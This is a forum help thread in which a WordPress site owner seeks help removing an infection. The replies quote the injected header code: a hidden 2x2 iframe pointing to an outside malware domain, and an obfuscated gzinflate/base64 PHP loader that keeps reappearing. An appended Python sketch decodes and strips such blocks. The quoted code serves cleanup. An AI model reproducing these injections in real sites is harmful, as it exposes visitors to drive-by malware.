
Warning: Please do not give out any FTP or ssh credentials to anyone, unless you trust them completely. Giving out login details is dangerous.

If the asker does not get an answer then they have 10 days to request a refund.

$15
Wordpress Virus installed onto site, Cannot remove

Hi guys, I am having some real difficulty removing a virus on my WordPress site. It goes by the name "oxsanasiberians". I can still access the admin, so it must be on the front end somewhere.

I have checked index.php files and theme_config etc. to no avail. I know these viruses must make use of a known loophole, and if anyone can help remove the virus it would be much appreciated.

My site is thebuxtedinn.co.uk

Kind Regards

This question has been answered.

smwilson | 07/08/12 at 6:36am


(5) Possible Answers Submitted...


  • avatar
    Last edited:
    07/08/12
    6:42am
    Jatin Soni says:

    I can see your homepage but not other pages. Only one JS text is in the header:

    document.write(''); xml:lang="en"> 
    Maybe you need to complete the code.

  • avatar
    Last edited:
    07/08/12
    6:46am
    Hai Bui says:

    If you can give me WP admin account (via PM), I will see if I can remove it.

  • avatar
    Last edited:
    07/08/12
    6:56am
    Nilesh shiragave says:

    Hi

    Please check all PHP files in your themes for virus code. Also check the wp-config.php, index.php and wp-app.php files in the root folder for virus code.

    Thanks

  • avatar
    Last edited:
    07/08/12
    8:12am
    Agus Setiawan says:

    Remove this code in header.php (before the <head> code):

    <script type="text/javascript">

    document.write('<iframe src="http://oxsanasiberians.com/downloads/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

    </script>
    ------------------

    I think there's another piece of code (maybe in function.php) that must be removed too. That code will check for their code in the header; if it is removed, the page will not load or will error.

    With your permission, please send me access to your dashboard and I'll try to fix this.

    Thank you.

    -------------------

    I think the site is working fine right now.

    • 07/08/12 7:44am

      smwilson says:

      OK, I have removed a script from the header before and it seems to have returned, although the code was written differently, as:

      <?php language_attributes();
      #c3284d#
      echo(gzinflate(base64_decode("JY5BDoIwEEX3JNyhmQ26oYlLpZzCCwztSMdA27SD4O0F2f285P//umIzJ1HyTWRAaBP9xg+eFPq6ctEuMwVp18xCl6bjV8aZVMnWgBdJd63jVjBg4YEyYyitjbN2cQ1TRFd0EZTSJp9Ahb1p4LmyCGVQ+0ucJg6jAVwkgvpPDzE7ygbCDnDiMRiwu8BR8MSjFwM3UCs78UfqO30q9c31UVedPt37Hw==")));
      #/c3284d#
      ?>

      Is there a PHP script which keeps adding code?

      Sometimes I can access the homepage, other times I cannot. So I don't know if the virus is running a script which automatically re-adds something to the header.php, but the JavaScript appears not to be visible within the header.php, rather something else.

      I have removed this new code but I am worried it will come back.

      I can now re-access the homepage however when I try accessing any pages within the navigation bar I get a 404 error page.

      Thank you for your help.
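
For the re-appearing block quoted in the reply above, an added example (not code from this thread or from WordPress): a Python sketch that finds marker-wrapped `echo(gzinflate(base64_decode(...)))` blocks in a PHP file's text, decodes the payload statically so it can be read without being run, and returns the text with the block stripped. The sample file, its `#a1b2c3#` marker and its payload are constructed, and the regex assumes the injection keeps the wrapper shape shown in the reply.

```python
import base64
import re
import zlib

# Wrapper shape from the thread: #xxxxxx# echo(gzinflate(base64_decode("..."))); #/xxxxxx#
INJECTION = re.compile(
    r'#(?P<tag>[0-9a-f]{6})#\s*'
    r'echo\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'
    r'["\'](?P<b64>[A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*\)\s*;\s*'
    r'#/(?P=tag)#\s*',
    re.IGNORECASE,
)
MAX_DECODED = 1 << 20  # cap inflated size so a crafted blob cannot exhaust memory

def decode_payload(b64: str) -> str:
    """Reproduce PHP's gzinflate(base64_decode(...)) statically; nothing is executed."""
    raw = base64.b64decode(b64, validate=True)
    inflater = zlib.decompressobj(-15)  # -15 selects raw DEFLATE, as gzinflate() reads
    return inflater.decompress(raw, MAX_DECODED).decode("utf-8", "replace")

def scan(source: str):
    """Return (findings, cleaned_source) for the text of one PHP file."""
    findings = []
    for m in INJECTION.finditer(source):
        try:
            decoded = decode_payload(m.group("b64"))
        except (ValueError, zlib.error) as exc:  # bad base64 or not a deflate stream
            decoded = f"<undecodable: {exc}>"
        line = source.count("\n", 0, m.start()) + 1
        findings.append({"marker": m.group("tag").lower(), "line": line, "decoded": decoded})
    return findings, INJECTION.sub("", source)

def make_sample() -> str:
    """Constructed header.php fragment carrying a harmless payload in the same wrapper."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = c.compress(b"<!-- constructed test payload -->") + c.flush()
    b64 = base64.b64encode(blob).decode()
    return ('<?php language_attributes();\n#a1b2c3#\n'
            f'echo(gzinflate(base64_decode("{b64}")));\n'
            '#/a1b2c3#\n?>\n<head>\n')

if __name__ == "__main__":
    hits, cleaned = scan(make_sample())
    for h in hits:
        print(f"line {h['line']} marker #{h['marker']}#: {h['decoded']}")
    print(cleaned)
```

Running `scan()` over every `.php` file under the site root, not only header.php, shows whether the same wrapper sits in other files, which matters here because the reply reports the block returning after removal.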

  • avatar
    Last edited:
    07/08/12
    7:33am
    Manoj Raj says:

    Please PM me the details of your hosting (cPanel details).

This question has expired.



Gabriel Reguly, Francisco Javier Carazo Gil, smwilson, Daniel Yoen voted on this question.



Current status of this question: Completed


